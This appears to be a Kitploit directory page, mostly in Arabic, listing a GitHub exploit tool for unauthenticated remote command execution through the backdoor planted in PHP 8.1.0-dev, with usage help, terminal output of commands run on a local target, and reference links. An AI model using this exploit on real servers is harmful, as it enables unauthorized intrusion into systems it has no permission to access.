Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PHP-8.1.0-dev_WebShell-RCE — PHP 8.1.0-dev WebShell Remote Code Execution | Kitploit
أدوات/GitHubGitHub/coldfusionx/php-8.1.0-dev_webshell-rce
ExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubcoldfusionx/php-8.1.0-dev_webshell-rce

PHP-8.1.0-dev_WebShell-RCE

PHP 8.1.0-dev WebShell Remote Code Execution

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
31منذ 5 سنواتلم تتم المراجعة بعد

PHP 8.1.0-dev WebShell RCE (بدون مصادقة)

كود استغلال لـ PHP 8.1.0-dev WebShell RCE (بدون مصادقة)

النتيجة المتوقعة: استغلال الباب الخلفي المثبّت على خادم PHP 8.1.0-dev وبالتالي الحصول على WebShell لتنفيذ الأوامر عن بُعد.

مصمم للأغراض التعليمية والاختبار في بيئات الشركات فقط.

تم اختبار هذا الاستغلال على Python 3.8.6

الاستخدام:

root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL]

PHP 8.1.0-dev WebShell RCE by ColdFusionX

optional arguments:
  -h, --help         show this help message and exit
  -l URL, --url URL  PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)

Exploit Usage : 
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami

مدخلات المستخدم:

يتطلب هذا الاستغلال وسيطات مفردة للتشغيل مبدئيًا:

  • -l : رابط الهدف لـ PHP 8.1.0-dev

POC

  • السيناريو 1: هدف صالح ومعرّض للثغرة
root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -l http://127.0.0.1

[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX 
 
Target is running on PHP 8.1.0-dev

*Shoot your commands below* 

[^] WebShell=- id

uid=1000(cfx) gid=1000(cfx) groups=1000(cfx)

[^] WebShell=- hostname

shockwave

[^] WebShell=- ^C
Exiting.
  • السيناريو 2: هدف غير صالح
root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -l http://127.0.0.1

[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX 
 
Invalid URL or Target Not Vulnerable

المراجع

  • https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • https://news-web.php.net/php.internals/113838
  • https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
  • https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
تنزيل الأداة